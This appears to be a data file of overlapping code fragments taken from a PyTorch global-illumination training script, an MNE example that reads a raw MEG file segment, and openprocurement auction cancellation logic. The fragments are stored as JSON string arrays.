"imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad()",
"( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() #",
"2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) )",
"default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the",
"= globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1)",
"models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader",
"##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size =",
"vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image(",
"imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) ####################################",
") ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size",
"depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs",
"% 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group",
"and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch",
"= segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 =",
"training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int,",
"- 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( (",
"segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs)",
"np from torch.autograd import Variable import torch.optim as optim import argparse import random",
"opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize",
"0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch +",
"dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of training",
"opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed)",
"# initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize,",
"much level of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel ==",
"detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we",
"roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu",
"the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( (",
"if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch =",
"= optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) )",
"= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype =",
"1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch =",
"imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build",
"training rate if (epoch + 1) % 2 == 0: for param_group in",
"CUDA device, so you should probably run with --cuda\") #################################### # initalize tensors",
"utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu',",
"store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the",
"for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height",
"j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) )",
"depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch",
"1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j)",
"= dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network",
"globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) )",
"type=int, default = -1, help='the training epoch of the network') # The detail",
"= opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if",
"segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu",
"globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype",
"os import models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data",
"1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n",
"# globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch,",
"utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch,",
"[] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch,",
"/= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList )",
"opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize,",
"use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None:",
"n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n)",
"np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j)",
"0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2)",
"# Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(),",
"(globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum /",
"GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch",
"image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus",
"[] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n",
"+ 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch)",
"= [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1):",
"Update the training rate if (epoch + 1) % 2 == 0: for",
"of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256,",
"dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = []",
") rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu )",
"Variable import torch.optim as optim import argparse import random import os import models",
"help='the path to store samples and models') # The basic training setting parser.add_argument('--nepoch',",
"list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader):",
"torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( (",
"0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch +",
") ) ############## ###################### # Send things into GPU if opt.cuda: albedoBatch =",
"trainingLog, epoch, j) if j == 1 or j == 1000 or j%",
"vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data,",
"as vutils import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser()",
"Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have",
"type=int, default=256, help='the height / width of the input image to network') parser.add_argument('--cuda',",
"nargs='+', default=[0], help='the gpus used for training network') # The training weight parser.add_argument('--globalIllu2',",
"globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) )",
"imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### #",
").cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch)",
"number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int,",
"help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of",
"batch_size = opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList=",
"# The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for",
"Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch",
"np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1,",
"globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch",
"- imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs)",
"weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float,",
"dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu to gpu",
"roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch,",
"= Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"or j == 1000 or j% 2000 == 0: # Save the ground",
"torch.autograd import Variable import torch.optim as optim import argparse import random import os",
"in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList )",
"dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth']",
"type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of",
"opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1,"
] |
[
"times = raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop] # read all",
"raw.close() ############################################################################### # Show MEG data import pylab as pl pl.close('all') pl.plot(times, data.T)",
"first start, stop = raw.time_to_index(100, 115) # 100 s to 115 s data",
"========================== Reading a raw file segment ========================== \"\"\" # Author: <NAME> <<EMAIL>> #",
"115) # 100 s to 115 s data segment data, times = raw[meg_channels_idx,",
"License: BSD (3-clause) print __doc__ import os from mne import fiff fname =",
"s data segment data, times = raw[meg_channels_idx, start:stop] # data, times = raw[:,",
"Reading a raw file segment ========================== \"\"\" # Author: <NAME> <<EMAIL>> # #",
"__doc__ import os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif'",
"mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude",
"<NAME> <<EMAIL>> # # License: BSD (3-clause) print __doc__ import os from mne",
"from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname)",
"= fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx =",
"meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first start,",
"times = raw[:, start:stop] # read all channels raw.close() ############################################################################### # Show MEG",
"fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443',",
"start:stop] # read all channels raw.close() ############################################################################### # Show MEG data import pylab",
"raw.time_to_index(100, 115) # 100 s to 115 s data segment data, times =",
"Author: <NAME> <<EMAIL>> # # License: BSD (3-clause) print __doc__ import os from",
"data, times = raw[:, start:stop] # read all channels raw.close() ############################################################################### # Show",
"stop = raw.time_to_index(100, 115) # 100 s to 115 s data segment data,",
"fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] #",
"5 first start, stop = raw.time_to_index(100, 115) # 100 s to 115 s",
"meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first start, stop = raw.time_to_index(100,",
"data, times = raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop] # read",
"segment ========================== \"\"\" # Author: <NAME> <<EMAIL>> # # License: BSD (3-clause) print",
"Show MEG data import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time (s)') pl.ylabel('MEG",
"raw[:, start:stop] # read all channels raw.close() ############################################################################### # Show MEG data import",
"= os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG",
"data import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time (s)') pl.ylabel('MEG data (T)')",
"(3-clause) print __doc__ import os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname",
"a raw file segment ========================== \"\"\" # Author: <NAME> <<EMAIL>> # # License:",
"channels raw.close() ############################################################################### # Show MEG data import pylab as pl pl.close('all') pl.plot(times,",
"import os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw",
"all channels raw.close() ############################################################################### # Show MEG data import pylab as pl pl.close('all')",
"========================== \"\"\" # Author: <NAME> <<EMAIL>> # # License: BSD (3-clause) print __doc__",
"+= '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] # bad",
"raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop] # read all channels raw.close()",
"os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw =",
"MEG data import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time (s)') pl.ylabel('MEG data",
"read all channels raw.close() ############################################################################### # Show MEG data import pylab as pl",
"fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first start, stop =",
"= raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop] # read all channels",
"channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first",
"fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG",
"segment data, times = raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop] #",
"# bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take",
"import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time (s)') pl.ylabel('MEG data (T)') pl.show()",
"# 100 s to 115 s data segment data, times = raw[meg_channels_idx, start:stop]",
"115 s data segment data, times = raw[meg_channels_idx, start:stop] # data, times =",
"# Author: <NAME> <<EMAIL>> # # License: BSD (3-clause) print __doc__ import os",
"<<EMAIL>> # # License: BSD (3-clause) print __doc__ import os from mne import",
"os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053']",
"\"\"\" ========================== Reading a raw file segment ========================== \"\"\" # Author: <NAME> <<EMAIL>>",
"to 115 s data segment data, times = raw[meg_channels_idx, start:stop] # data, times",
"# data, times = raw[:, start:stop] # read all channels raw.close() ############################################################################### #",
"raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx",
"\"\"\" # Author: <NAME> <<EMAIL>> # # License: BSD (3-clause) print __doc__ import",
"2443', 'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx =",
"raw file segment ========================== \"\"\" # Author: <NAME> <<EMAIL>> # # License: BSD",
"s to 115 s data segment data, times = raw[meg_channels_idx, start:stop] # data,",
"# License: BSD (3-clause) print __doc__ import os from mne import fiff fname",
"053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] #",
"import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude =",
"'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5]",
"# # License: BSD (3-clause) print __doc__ import os from mne import fiff",
"take 5 first start, stop = raw.time_to_index(100, 115) # 100 s to 115",
"= raw[:, start:stop] # read all channels raw.close() ############################################################################### # Show MEG data",
"start:stop] # data, times = raw[:, start:stop] # read all channels raw.close() ###############################################################################",
"bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5",
"100 s to 115 s data segment data, times = raw[meg_channels_idx, start:stop] #",
"print __doc__ import os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname +=",
"'/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] # bad channels",
"data segment data, times = raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop]",
"BSD (3-clause) print __doc__ import os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH']",
"fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'],",
"start, stop = raw.time_to_index(100, 115) # 100 s to 115 s data segment",
"meg_channels_idx[:5] # take 5 first start, stop = raw.time_to_index(100, 115) # 100 s",
"= raw.time_to_index(100, 115) # 100 s to 115 s data segment data, times",
"= fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first start, stop",
"# Show MEG data import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time (s)')",
"file segment ========================== \"\"\" # Author: <NAME> <<EMAIL>> # # License: BSD (3-clause)",
"# take 5 first start, stop = raw.time_to_index(100, 115) # 100 s to",
"exclude = ['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True,",
"meg_channels_idx = meg_channels_idx[:5] # take 5 first start, stop = raw.time_to_index(100, 115) #",
"# read all channels raw.close() ############################################################################### # Show MEG data import pylab as",
"= ['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude)",
"############################################################################### # Show MEG data import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time",
"= meg_channels_idx[:5] # take 5 first start, stop = raw.time_to_index(100, 115) # 100",
"exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first start, stop = raw.time_to_index(100, 115)",
"['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx"
] |
[
"is reason of action this method return instance of Action \"\"\" # check",
"= request.validated['json_data'].get('status') if context.status == 'pending' and new_status == 'active': return cls return",
"will set to 'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete",
"openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction):",
"action this method return instance of Action \"\"\" # check if patch is",
"log_auction_status_change(self.request, self.context, status) # clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if",
"'active.enquiry', 'active.auction'] delete all bids \"\"\" validators = [] @classmethod def demand(cls, request,",
"class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation action when auction owner activate cancellation (patch status",
"openprocurement.auctions.core.utils import ( log_auction_status_change ) from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base",
"Constructor method. If it is reason of action this method return instance of",
"it is reason of action this method return instance of Action \"\"\" #",
"status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) # clean bids after",
"AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\" Cancellation Activation",
"'active'): - auction.status will set to 'cancelled' - if procedure in statuses ['active.tendering',",
"context.status == 'pending' and new_status == 'active': return cls return False def act(self):",
"\"\"\" validators = [] @classmethod def demand(cls, request, context): \"\"\" Constructor method. If",
"of action this method return instance of Action \"\"\" # check if patch",
"demand(cls, request, context): \"\"\" Constructor method. If it is reason of action this",
"when auction owner activate cancellation (patch status to 'active'): - auction.status will set",
"# pendify auction status status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status)",
"status) # clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status in",
"self.request.auction # pendify auction status status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context,",
"log_auction_status_change ) from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction",
"validators = [] @classmethod def demand(cls, request, context): \"\"\" Constructor method. If it",
"of Action \"\"\" # check if patch is for activating cancellation new_status =",
"activate cancellation (patch status to 'active'): - auction.status will set to 'cancelled' -",
"delete all bids \"\"\" validators = [] @classmethod def demand(cls, request, context): \"\"\"",
"[] @classmethod def demand(cls, request, context): \"\"\" Constructor method. If it is reason",
"import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): \"\"\"",
"in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids \"\"\" validators = [] @classmethod",
"# clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION:",
"from openprocurement.auctions.core.utils import ( log_auction_status_change ) from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from",
"if patch is for activating cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending'",
"auction status status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) # clean",
"import ( log_auction_status_change ) from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import",
"== 'active': return cls return False def act(self): auction = self.request.auction # pendify",
"status log_auction_status_change(self.request, self.context, status) # clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status']",
"= self.request.auction # pendify auction status status = 'cancelled' auction.status = status log_auction_status_change(self.request,",
"patch is for activating cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending' and",
"def demand(cls, request, context): \"\"\" Constructor method. If it is reason of action",
"Cancellation Activation action when auction owner activate cancellation (patch status to 'active'): -",
"return False def act(self): auction = self.request.auction # pendify auction status status =",
"owner activate cancellation (patch status to 'active'): - auction.status will set to 'cancelled'",
"cls return False def act(self): auction = self.request.auction # pendify auction status status",
"status to 'active'): - auction.status will set to 'cancelled' - if procedure in",
"reason of action this method return instance of Action \"\"\" # check if",
